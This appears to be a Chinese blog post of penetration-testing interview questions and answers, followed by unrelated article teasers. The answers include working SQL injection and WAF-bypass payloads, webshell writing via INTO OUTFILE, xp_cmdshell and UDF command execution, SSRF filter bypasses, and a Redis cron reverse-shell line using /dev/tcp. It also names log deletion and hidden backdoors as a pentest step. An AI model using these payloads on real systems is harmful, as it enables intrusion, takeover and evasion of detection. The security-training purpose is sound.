2025年渗透测试面试题总结- 某亭-安全研究员(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
一、SQL注入过滤单引号绕过方法
二、MySQL报错注入常用函数
三、报错注入绕WAF
四、MySQL写文件函数
五、MySQL提权方式
六、SQL Server其他渗透方式
七、SSRF原理与利用
八、内网IP过滤绕过
九、Redis漏洞利用
十、文件读取与路径获取
十一、反序列化漏洞
十二、渗透测试流程
十三、CMS指纹特征(以WordPress为例)
十四、正向代理与反向代理区别
十五、常见端口与服务
十六、弱密码绕过验证码
十七、非对称加密过程(RSA)
SQL注入过滤单引号怎么绕过 mysql报错注入常用函数 报错注入绕WAF mysql写文件函数 into outfile使用有哪些限制 mysql提权 SQL server除了SQL注入以外还有哪些渗透方式 SSRF原理 SSRF可以利用的协议 哪些功能点会存在SSRF漏洞 对内网IP进行过滤,有什么绕过方式 redis rce过程 redis未授权怎么获得服务器权限 redis主从复制漏洞 任意文件读取一般读取哪些文件 如何通过文件读取获得web的绝对路径 /ect/passwd 文件包含哪些内容 java 反序列化漏洞 shiro反序列化漏洞 哪些组件或者中间件存在反序列化漏洞 渗透测试一个站点的具体流程 说一个熟悉的CMS,具有哪些指纹特征 正向代理和反向代理的区别 常见端口对应服务 常见的内置用户 弱密码存在验证码如何绕过 非对称加密的加密过程一、SQL注入过滤单引号绕过方法
- 双写单引号:
'转为'',可能被过滤,但部分场景可尝试' OR 1=1--。- Hex编码:将字符串转为16进制,如
SELECT * FROM users WHERE username=0x61646D696E。- 宽字节注入:针对GBK编码数据库,利用
%df%27触发编码错误(%df与反斜杠\结合生成繁体字符)。- CHAR()函数:用
CHAR(39)代替单引号(如SELECT CHAR(97,100,109,105,110)对应admin)。- 字符串拼接:如
CONCAT('a','dmin')拼接为admin。
二、MySQL报错注入常用函数
- updatexml():sql
触发XPath语法错误,返回查询结果。AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)- extractvalue():
sql类似AND extractvalue(1,concat(0x7e,(SELECT database())))updatexml,利用XML解析报错。- floor()+rand():
sql利用主键重复报错。SELECT COUNT(*) FROM users GROUP BY concat(database(),floor(rand(0)*2))- exp():sql
数值过大导致溢出报错。AND exp(~(SELECT * FROM(SELECT user())a))
三、报错注入绕WAF
- 分块传输:通过HTTP分块编码绕过正则检测。
- 注释干扰:
sql/*!50000updatexml*/(1,concat(0x7e,user()),1)- 大小写混合:如
UpDaTeXmL()。- 特殊符号分割:
sqlupdatexml(1,concat(0x7e,user()%23),1)- 编码混淆:使用URL编码、Unicode编码(如
%u0027代替单引号)。
四、MySQL写文件函数
into outfile:写入多行数据,需绝对路径和权限。sqlSELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php'dumpfile:写入二进制文件(如SSH密钥)。限制:
secure_file_priv需为空或目标目录。- Web目录需可写且路径正确。
五、MySQL提权方式
- UDF提权:
- 上传自定义动态库(如
lib_mysqludf_sys.so)。- 创建函数执行系统命令:
sqlCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so'- 启动项提权:
sqlSELECT '恶意命令' INTO OUTFILE '/etc/rc.local'- CVE漏洞利用:如CVE-2016-6662(权限配置不当)。
六、SQL Server其他渗透方式
- xp_cmdshell:启用后执行系统命令。
sqlEXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'- SSRS漏洞:利用Reporting Services的文件上传漏洞。
- 数据库链接攻击:通过
OPENROWSET跨数据库查询。
七、SSRF原理与利用
- 原理:服务器端发起未验证的网络请求(如读取本地文件或访问内网)。
- 协议利用:
file://读取本地文件(如file:///etc/passwd)。gopher://构造任意TCP流量(攻击Redis/MySQL)。dict://探测端口信息。- 高危功能点:
- 在线翻译、网页截图、URL预览、XML解析(XXE)等。
八、内网IP过滤绕过
- 进制转换:
127.0.0.1转为2130706433(十进制)或0177.0.0.1(八进制)。- 域名重定向:使用短域名服务或
xip.io(如127.0.0.1.xip.io)。- CIDR绕过:
127.127.127.127/8。
九、Redis漏洞利用
- 未授权访问RCE:
- 写入SSH密钥:
redisconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save- 定时任务提权:
redisset x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n" config set dir /var/spool/cron config set dbfilename root save- 主从复制漏洞:加载恶意模块执行命令。
十、文件读取与路径获取
- 敏感文件:
/etc/passwd:用户列表。/proc/self/environ:环境变量(可能含路径)。- 日志文件(如
/var/log/apache2/access.log)。- 路径获取:
- 从PHP错误日志或
phpinfo()中查找绝对路径。- 配置文件(如
config.php中的__DIR__)。
十一、反序列化漏洞
- Java反序列化:Apache Commons Collections的
InvokerTransformer链触发RCE。- Shiro漏洞:硬编码AES密钥导致Cookie伪造(Padding Oracle攻击)。
- 常见漏洞组件:
- WebLogic(CVE-2020-14882)。
- Fastjson(自动类型推断导致的RCE)。
十二、渗透测试流程
- 信息收集:子域名、端口扫描、CMS指纹识别(如Wappalyzer)。
- 漏洞扫描:Nessus、AWVS检测SQL注入/XSS/SSRF。
- 漏洞利用:Metasploit框架、手工验证。
- 权限提升:Linux脏牛漏洞、Windows MS14-058。
- 痕迹清理:删除日志、隐藏后门。
十三、CMS指纹特征(以WordPress为例)
- 目录结构:
/wp-content/plugins/、/wp-admin/。- HTTP头:
X-Powered-By: WordPress。- 默认文件:
readme.html、wp-login.php。
十四、正向代理与反向代理区别
正向代理 反向代理 代理客户端(隐藏客户端IP) 代理服务端(隐藏服务器IP) 用于突破访问限制(如VPN) 用于负载均衡(如Nginx)
十五、常见端口与服务
端口 服务 协议 22 SSH TCP 80 HTTP TCP 443 HTTPS TCP 3306 MySQL TCP 6379 Redis TCP
十六、弱密码绕过验证码
- OCR识别:Tesseract识别简单验证码。
- 验证码复用:同一会话重复提交。
- Burp暴力破解:设置Intruder模块跳过验证码参数。
十七、非对称加密过程(RSA)
- 密钥生成:生成公钥(公开)和私钥(保密)。
- 加密:用公钥加密明文(如
c = m^e mod n)。- 解密:用私钥解密密文(如
m = c^d mod n)。- 应用场景:HTTPS握手、SSH登录。
相关文章:
2025年渗透测试面试题总结- 某亭-安全研究员(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 一、SQL注入过滤单引号绕过方法 二、MySQL报错注入常用函数 三、报错注入绕WAF 四、MySQL写文件函数…...
Redis分布式锁如何实现——简单理解版
目录 前言 满足条件 加锁之后产生的问题 避免死锁的方法 Lua脚本实现避免释放其他锁 看门狗判断过期 扩展 Lua脚本 Redission 前言 在如今开发的某些项目中,多个进程必须以互斥的方式独占共享资源,这时用分布式锁是最直接有效的,分布式…...
数字化转型驱动卫生用品安全革新
当315晚会上晃动的暗访镜头揭露卫生巾生产车间里漂浮的异物、纸尿裤原料仓中霉变的碎屑时,这一触目惊心的场景无情地撕开了“贴身安全”的遮羞布,暴露的不仅是部分企业的道德缺失,更凸显了当前检测与监管体系的漏洞,为整个行业敲响…...
北京南文观点:品牌如何抢占AI 认知的 “黄金节点“
在算法主导的信息洪流中,品牌正在经历一场隐蔽的认知权争夺战,当用户向ChatGPT咨询"哪家新能源车企技术最可靠"时,AI调取的知识图谱数据源将直接决定品牌认知排序。南文乐园科技文化(北京)有限公司ÿ…...
:CAPBASE理论)
分布式(一):CAPBASE理论
1 CAP理论 1.1 简介 CAP也就是Consistency(一致性)、Availability(可用性)、Partition Tolenrance(分区容错性)这三个单词首字母组合。 在理论计算机科学中,CAP定理(CAP theorem&…...
自适应柔顺性策略:扩散引导控制中学习近似的柔顺
24年10月来自斯坦福大学和 TRI 的论文“Adaptive Compliance Policy: Learning Approximate Compliance for Diffusion Guided Control”。 柔顺性在操作中起着至关重要的作用,因为它可以在不确定的情况下平衡位置和力的并发控制。然而,当今的视觉运动策…...
python中所有内置类型
文章目录 数值类型序列类型集合类型映射类型布尔类型空类型代码汇总 在 Python 中,数据类型可分为内置数据类型和用户自定义数据类型。内置数据类型是 Python 解释器直接支持的类型 数值类型 整数(int):表示整数,可正…...
「Java-API帮助文档」
「Java-API帮助文档」,链接:https://pan.quark.cn/s/d7ced3b48f33 java.applet提供创建 applet 所必需的类和 applet 用来与其 applet 上下文通信的类。java.awt包含用于创建用户界面和绘制图形图像的所有类。java.awt.color提供用于颜色空间的类。java…...
1204. 【高精度练习】密码
文章目录 题目描述输入输出样例输入样例输出数据范围限制CAC代码 题目描述 人们在做一个破译密码游戏: 有两支密码棒分别是红色和蓝色,把红色密码棒上的数字减去蓝色 密码棒上的数字,就是开启密码锁的密码。 现已知密码棒上的数字位数不超过…...
SVN简明教程——下载安装使用
SVN教程目录 一、开发中的实际问题二、简介2.1 版本控制2.2 Subversion2.3 Subversion的优良特性2.4 工作原理2.5 SVN基本操作 三、Subversion的安装与配置1. 服务器端程序版本2. 下载源码包3. 下载二进制安装包4. 安装5. 配置版本库① 为什么要配置版本库?② 创建目…...
“智改数转”新风口,物联网如何重构制造业竞争力?
一、政策背景 为深化制造业智能化改造、数字化转型、网络化联接,江苏省制定了《江苏省深化制造业智能化改造数字化转型网络化联接三年行动计划(2025-2027年)》,提出到2027年,全省制造业企业设备更新、工艺…...
从数据洪流到智能洞察:人工智能如何解锁大数据的价值?
引言:数据洪流时代,企业的机遇与挑战 在这个信息爆炸的时代,数据正以前所未有的速度增长。IDC预测,全球数据量将在未来几年内持续飙升,企业每天都会产生海量的用户行为数据、市场交易数据、设备传感数据等。理论上&…...
蓝桥杯 之 数论
文章目录 习题质数找素数 LCM报数游戏 快速幂数字诗意 组合数与错位排序小蓝与钥匙 同余取模 数论,就是一些数学问题,蓝桥杯十分喜欢考察,常见的数论的问题有:取模,同余,大整数分解,素数&#x…...
SpringBoot的启动原理?
大家好,我是锋哥。今天分享关于【SpringBoot的启动原理?】面试题。希望对大家有帮助; SpringBoot的启动原理? 1000道 互联网大厂Java工程师 精选面试题-Java资源分享网 Spring Boot的启动原理主要是通过 SpringApplication 类来…...
从零开始搭建向量数据库:基于 Xinference 和 Milvus 的文本搜索实践
引言 在 AI 和大数据时代,向量数据库正成为处理非结构化数据(如文本、图像)的利器。最近,我尝试用 Xinference 和 Milvus 搭建一个简单的文本搜索系统,从读取本地文本文件到实现交互式查询和高亮显示匹配结果…...
音视频系列——Websockets接口封装为Http接口
模型服务示例:实时语音转文本服务 本示例展示一个支持双协议(WebSocket流式接口HTTP同步接口)的语音转文本模型服务,并提供将WebSocket接口封装为HTTP接口的代码实现。 一、服务架构设计 #mermaid-svg-nw0dMZ4uKfS4vGZR {font-fa…...
scrapy入门(深入)
Scrapy框架简介 Scrapy是:由Python语言开发的一个快速、高层次的屏幕抓取和web抓取框架,用于抓取web站点并从页面中提取结构化的数据,只需要实现少量的代码,就能够快速的抓取。 新建项目 (scrapy startproject xxx):新建一个新的…...
docker模拟Dos_SYN Flood拒绝服务攻击 (Ubuntu20.04)
目录 ✅ 一、实验环境准备(3 个终端) 👉 所以最终推荐做法: 2️⃣ 配置 seed-attacker 为攻击者,开启 telnet 服务: 3️⃣ 配置 victim-10.9.0.5 为受害者服务器,开启 telnet 客户端并监听&…...
使用 Ansys Fluent 评估金属管道腐蚀
金属管道的维护和完整性在石油和天然气、石化和供水等各个行业中都至关重要。腐蚀对这些管道构成了重大威胁,可能导致泄漏、结构故障和环境危害。Ansys Fluent 提供了一个强大的平台来建模和分析金属管道腐蚀。 腐蚀是一种自然过程,金属材料会因与环境发…...
firefly经典蓝牙和QProcess、QFileSystemWatcher记录
QProcess 默认不会启动一个 shell 来解析命令,而是直接调用操作系统的系统调用来启动外部程序。也就是通过fork一个子线程或者exec一个子进程来执行命令。 QProcess的参数模式 QProcess 需要明确指定命令的可执行文件路径或参数列表。 如果命令是一个可执行文件的路径…...
基于PySide6的CATIA自动化工具开发实战——空几何体批量清理系统
一、功能概述 本工具通过PySide6构建用户界面,结合PyCATIA库实现CATIA V5的自动化操作,提供两大核心功能: 空几何体清理:智能识别并删除零件文档中的无内容几何体(Bodies)空几何图形集清理࿱…...
Blender配置渲染设置并输出动画
在Blender中,渲染设置和渲染动画的选项位于不同的面板中。以下是具体步骤: 渲染设置 渲染设置用于配置输出格式、分辨率、帧率等参数。 打开右侧的 属性面板(按 N 键可切换显示)。 点击 “输出属性” 选项卡(图标是…...
Spring 声明式事务应该怎么学?
1、引言 Spring 的声明式事务极大地方便了日常的事务相关代码编写,它的设计如此巧妙,以至于在使用中几乎感觉不到它的存在,只需要优雅地加一个 Transactional 注解,一切就都顺理成章地完成了! 毫不夸张地讲ÿ…...
C++11 引入了的新特性与实例说明
C11 引入了许多重要的新特性,以下是一些关键特性及其对应的示例代码,用于体现这些特性的用法和优势。 1. 自动类型推导 (auto) auto 关键字允许编译器自动推导变量的类型,简化代码书写。 #include <iostream> #include <vector>…...
二手Mac验机过程
1.1 外观检查 螺丝是否拧过螺丝 1.2 关于本机中 序列号,盒子序列号,机器背部 核对参数 https://checkcoverage.apple.com/coverage 1.3 检查apple ID与查找 1 登出 iCloud、iTunes、FaceTime、iMessage 在 Mac 上打開「訊息」應用程式,從上方…...
从 0 到 1 掌握鸿蒙 AudioRenderer 音频渲染:我的自学笔记与踩坑实录(API 14)
最近我在研究 HarmonyOS 音频开发。在音视频领域,鸿蒙的 AudioKit 框架提供了 AVPlayer 和 AudioRenderer 两种方案。AVPlayer 适合快速实现播放功能,而 AudioRenderer 允许更底层的音频处理,适合定制化需求。本文将以一个开发者的自学视角&a…...
Android 13深度定制:SystemUI状态栏时间居中显示终极实战指南
一、架构设计与技术解析 1. SystemUI状态栏核心布局机制 层级结构 mermaid 复制 graph TDPhoneStatusBarView --> StatusBarContents[status_bar_contents]StatusBarContents --> LeftLayout[status_bar_left_side]StatusBarContents --> ClockLayout[Clock控件]Left…...
支持多系统多协议且可提速的下载工具
在网络下载需求日益多样的当下,一款好用的下载器能极大提升效率。今天就给大家介绍 AB Download Manager,它免费又开源,能适配 Windows 和 Linux 系统,带来超便捷的下载体验。 AB Download Manager 采用先进的多线程技术…...
【leetcode hot 100 22】括号生成
解法一:(回溯法)用两个整数记录左右括号数,以在回溯过程中保证先生成左括号,且左右括号数不能大于n。 class Solution {public List<String> generateParenthesis(int n) {List<String> result new Arra…...
如何在 HTML 中创建一个有序列表和无序列表,它们的语义有何不同?
大白话如何在 HTML 中创建一个有序列表和无序列表,它们的语义有何不同? 1. HTML 中有序列表和无序列表的基本概念 在 HTML 里,列表是一种用来组织信息的方式。有序列表就是带有编号的列表,它可以让内容按照一定的顺序呈现&#…...